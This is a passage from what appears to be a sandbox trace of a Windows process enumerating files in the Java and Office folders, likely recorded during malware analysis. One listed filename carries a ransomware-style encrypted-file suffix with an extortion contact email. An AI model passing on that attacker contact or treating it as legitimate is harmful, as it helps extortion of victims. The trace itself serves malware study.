dwReserved0=0x0, dwReserved1=0x0, cFileName="cmm", cAlternateFileName="")) returned 1 [0179.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4390058 [0179.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2d58 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CIEXYZ.pf", cAlternateFileName="")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="GRAY.pf", cAlternateFileName="")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LINEAR_RGB.pf", cAlternateFileName="LINEAR~1.PF")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4302a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PYCC.pf", cAlternateFileName="")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sRGB.pf", cAlternateFileName="")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sRGB.pf", cAlternateFileName="")) returned 0 [0179.336] FindClose (in: hFindFile=0x43a2d58 | out: hFindFile=0x43a2d58) returned 1 [0179.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0179.336] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x101a, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.data", cAlternateFileName="CURREN~1.DAT")) returned 1 [0179.337] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy", cAlternateFileName="")) returned 1 [0179.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4390058 [0179.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a28d8 [0179.628] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.801] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d2eca, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x33d2eca, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3464e04, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x383a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ffjcext.zip.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="FFJCEX~1.BAT")) returned 1 [0179.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.802] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0179.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.804] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0179.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.805] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0179.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.807] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0179.807] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0179.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.807] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0179.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.808] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0179.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.809] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0179.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0179.811] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0179.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0179.811] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0179.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0179.812] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 0 [0179.812] FindClose (in: hFindFile=0x43a2f58 | out: hFindFile=0x43a2f58) returned 1 [0179.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0179.813] FindNextFileW (in: hFindFile=0x43a2d98, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3ded678, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3ded678, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0179.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.815] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4ef028f, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4ef028f, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0179.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.817] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0179.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0179.820] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0181.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0181.813] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0181.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.814] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0181.814] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0181.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0181.814] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0181.814] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0181.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0181.815] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0181.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0181.816] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0181.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0181.818] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0181.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0181.821] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 1 [0181.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0181.821] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114f5747, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Flattener", cAlternateFileName="FLATTE~1")) returned 1 [0181.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0181.823] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fre", cAlternateFileName="")) returned 1 [0181.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0181.825] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0181.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0181.828] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Licenses16", cAlternateFileName="LICENS~1")) returned 1 [0182.381] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0182.381] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee45f66d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 